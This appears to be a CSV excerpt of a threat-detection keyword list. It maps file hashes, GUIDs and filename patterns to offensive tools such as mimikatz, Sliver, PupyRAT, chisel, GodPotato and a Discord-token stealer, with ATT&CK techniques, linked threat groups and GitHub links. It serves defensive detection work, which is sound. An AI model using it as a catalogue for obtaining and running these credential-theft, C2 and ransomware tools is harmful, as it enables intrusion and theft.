"*2f9b32300b30c7a70e5fc37adae993bd93b35d6e13b90eebb375e1718a991058*",".{0,1000}2f9b32300b30c7a70e5fc37adae993bd93b35d6e13b90eebb375e1718a991058.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","24110"
"*2fa02db89575d18c68adbe39e2db1565d9d688adce00b3ba85d6407d3b0cc911*",".{0,1000}2fa02db89575d18c68adbe39e2db1565d9d688adce00b3ba85d6407d3b0cc911.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24111"
"*2fa193f29d79be4213c7310cb815f08c4c426ba02720d598f79ac0f69fe999ca*",".{0,1000}2fa193f29d79be4213c7310cb815f08c4c426ba02720d598f79ac0f69fe999ca.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24112"
"*2fa97965c5491fd73b586656a2a3d376013fa20918cc501f598439b85e49e244*",".{0,1000}2fa97965c5491fd73b586656a2a3d376013fa20918cc501f598439b85e49e244.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","#filehash","N/A","10","","N/A","","","","24114"
"*2fb873b8303300b7a5df14c5bf0271118343bc20c3f36208148b5e4966c47a36*",".{0,1000}2fb873b8303300b7a5df14c5bf0271118343bc20c3f36208148b5e4966c47a36.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","24117"
"*2FB94059-2D49-4EEA-AAF8-7E89E249644B*",".{0,1000}2FB94059\-2D49\-4EEA\-AAF8\-7E89E249644B.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","24118"
"*2fbc59378c66069942a5b99d32551d080f7f8a984e568c7b408e6c7b67bdebff*",".{0,1000}2fbc59378c66069942a5b99d32551d080f7f8a984e568c7b408e6c7b67bdebff.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","24119"
"*2fbf10428ccc2e463e88aae2aadd3efdf686d510c42d7b5aca2b4f126bb8296f*",".{0,1000}2fbf10428ccc2e463e88aae2aadd3efdf686d510c42d7b5aca2b4f126bb8296f.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","24120"
"*2fbf1231cc622fd4b910a7fc7b474af1dcd1acbdc13b8233b852416009b9bb20*",".{0,1000}2fbf1231cc622fd4b910a7fc7b474af1dcd1acbdc13b8233b852416009b9bb20.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24121"
"*2fbf1231cc622fd4b910a7fc7b474af1dcd1acbdc13b8233b852416009b9bb20*",".{0,1000}2fbf1231cc622fd4b910a7fc7b474af1dcd1acbdc13b8233b852416009b9bb20.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24122"
"*2fc0adccdf3683c94c1e6c47274e567d980a576f89e8b9672a98de04528eb348*",".{0,1000}2fc0adccdf3683c94c1e6c47274e567d980a576f89e8b9672a98de04528eb348.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","24123"
"*2fc2426035652b2ecfc952407b4d22ab78b9ae554da8f2466bccf48fa2a3870a*",".{0,1000}2fc2426035652b2ecfc952407b4d22ab78b9ae554da8f2466bccf48fa2a3870a.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","24125"
"*2fc4590134d1420bbac69beeed06c448f185b59c2856781966b33d7d6fda78e3*",".{0,1000}2fc4590134d1420bbac69beeed06c448f185b59c2856781966b33d7d6fda78e3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24126"
"*2fc6ab3630221478642ba96c1adf85136582e83bf9d935216ed8a7b96343cce1*",".{0,1000}2fc6ab3630221478642ba96c1adf85136582e83bf9d935216ed8a7b96343cce1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","24127"
"*2fcac3a62e1125dcdad1f7e2681de4ed2e5dc01d474f1ee5b23d156a5116d510*",".{0,1000}2fcac3a62e1125dcdad1f7e2681de4ed2e5dc01d474f1ee5b23d156a5116d510.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","24128"
"*2fd04964c571de856492e42f27043367c4b8e452a7f4719a1bdb0470b2b6576c*",".{0,1000}2fd04964c571de856492e42f27043367c4b8e452a7f4719a1bdb0470b2b6576c.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#filehash","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","24129"
"*2fd282cb4a91d1d4f3203bb55965efd86e8fecabf8594a3cd785552b6369eb7f*",".{0,1000}2fd282cb4a91d1d4f3203bb55965efd86e8fecabf8594a3cd785552b6369eb7f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24130"
"*2fd7939a7484f5959d7de4e7a5f047de8df3e2e8faeb6f6f90d0bd2dbee5a0b4*",".{0,1000}2fd7939a7484f5959d7de4e7a5f047de8df3e2e8faeb6f6f90d0bd2dbee5a0b4.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","24131"
"*2fd99d56b4565653d6d39f1bd747dd14d24aa4d5882dc237da165974791b513c*",".{0,1000}2fd99d56b4565653d6d39f1bd747dd14d24aa4d5882dc237da165974791b513c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24132"
"*2fe32ea10b81598147f6d39cc0ae54a03a5384c73d1fba22fc3f9ae6589ec266*",".{0,1000}2fe32ea10b81598147f6d39cc0ae54a03a5384c73d1fba22fc3f9ae6589ec266.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","24135"
"*2fe3e062aad09c372500bdef858a32344d95c7b8036d4cb5f0091a2db17b446f*",".{0,1000}2fe3e062aad09c372500bdef858a32344d95c7b8036d4cb5f0091a2db17b446f.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","#filehash","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","24136"
"*2fe5dc013f99c83e5c353ab5a064ad0ce2f197debb7b03f430934004923f6071*",".{0,1000}2fe5dc013f99c83e5c353ab5a064ad0ce2f197debb7b03f430934004923f6071.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","#filehash","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","24137"
"*2FE6C1D0-0538-48DB-B4FA-55F0296A5150*",".{0,1000}2FE6C1D0\-0538\-48DB\-B4FA\-55F0296A5150.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","#GUIDproject","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","24138"
"*2fea83d7bfccf5b1e8a5047b27d872bcfb18f5aa4ab71e038c4f56554ee2f108*",".{0,1000}2fea83d7bfccf5b1e8a5047b27d872bcfb18f5aa4ab71e038c4f56554ee2f108.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24139"
"*2feda61b4bfe2c6f693f3201ddaec6f08a2df01c63234e933d9041a2e37a7045*",".{0,1000}2feda61b4bfe2c6f693f3201ddaec6f08a2df01c63234e933d9041a2e37a7045.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24142"
"*2fef430e1b4c0fd66bcacefb5b90e7ea1b036dc377dbaa0d5543e429b71aea76*",".{0,1000}2fef430e1b4c0fd66bcacefb5b90e7ea1b036dc377dbaa0d5543e429b71aea76.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24143"
"*2ff4c6949bab3ffb8c95b21f9c5eb597b93af66e3bfb635ba2bf92fd534e995b*",".{0,1000}2ff4c6949bab3ffb8c95b21f9c5eb597b93af66e3bfb635ba2bf92fd534e995b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24146"
"*2ff4c6949bab3ffb8c95b21f9c5eb597b93af66e3bfb635ba2bf92fd534e995b*",".{0,1000}2ff4c6949bab3ffb8c95b21f9c5eb597b93af66e3bfb635ba2bf92fd534e995b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24147"
"*2ff605e64eb4fa723b59b90f9ef36c5aeb4332695367697e91997a5b6dc463ba*",".{0,1000}2ff605e64eb4fa723b59b90f9ef36c5aeb4332695367697e91997a5b6dc463ba.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","24148"
"*2ffb7bfe8f888c083361a65e7a8a349ba1f6b16971522011f545029fb20b3fd1*",".{0,1000}2ffb7bfe8f888c083361a65e7a8a349ba1f6b16971522011f545029fb20b3fd1.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#filehash","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","24149"
"*2ffc8e93d89c9f9c090df5e44eb7921633c6954176b06183acbd459369a919b8*",".{0,1000}2ffc8e93d89c9f9c090df5e44eb7921633c6954176b06183acbd459369a919b8.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","24150"
"*2Ftun2socks*",".{0,1000}2Ftun2socks.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#content","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24151"
"*2john.c",".{0,1000}2john\.c","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","24152"
"*2john.lua*",".{0,1000}2john\.lua.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","24153"
"*2john.pl*",".{0,1000}2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","24154"
"*2john.py*",".{0,1000}2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","24155"
"*3000b91468e3961b4e1a9ecd07007bfe02f50033d0d4a71dfb4e5b1de778bd13*",".{0,1000}3000b91468e3961b4e1a9ecd07007bfe02f50033d0d4a71dfb4e5b1de778bd13.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","24156"
"*3002ae0a5cc844b862c99f1d561f9530df8d6259f970d038baeac665a153b91c*",".{0,1000}3002ae0a5cc844b862c99f1d561f9530df8d6259f970d038baeac665a153b91c.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","24159"
"*3002cc4ccf57741919e563283d63b762f29512aafe16837b297c6d70e014bd04*",".{0,1000}3002cc4ccf57741919e563283d63b762f29512aafe16837b297c6d70e014bd04.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24160"
"*300875180931c7f9f62908e72395f992510eea9e*",".{0,1000}300875180931c7f9f62908e72395f992510eea9e.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","24161"
"*3010a92d74293dc8e410f48f329b221230818b206f57fda830acb449bd53497d*",".{0,1000}3010a92d74293dc8e410f48f329b221230818b206f57fda830acb449bd53497d.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","24162"
"*30250e5814a1c0735d0f260d69ae237636f795f6a425ad2162d18a758e0fef1f*",".{0,1000}30250e5814a1c0735d0f260d69ae237636f795f6a425ad2162d18a758e0fef1f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24164"
"*3027a212272957298bf4d32505370fa63fb162d6a6a6ec091af9d7626317a858*",".{0,1000}3027a212272957298bf4d32505370fa63fb162d6a6a6ec091af9d7626317a858.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","24165"
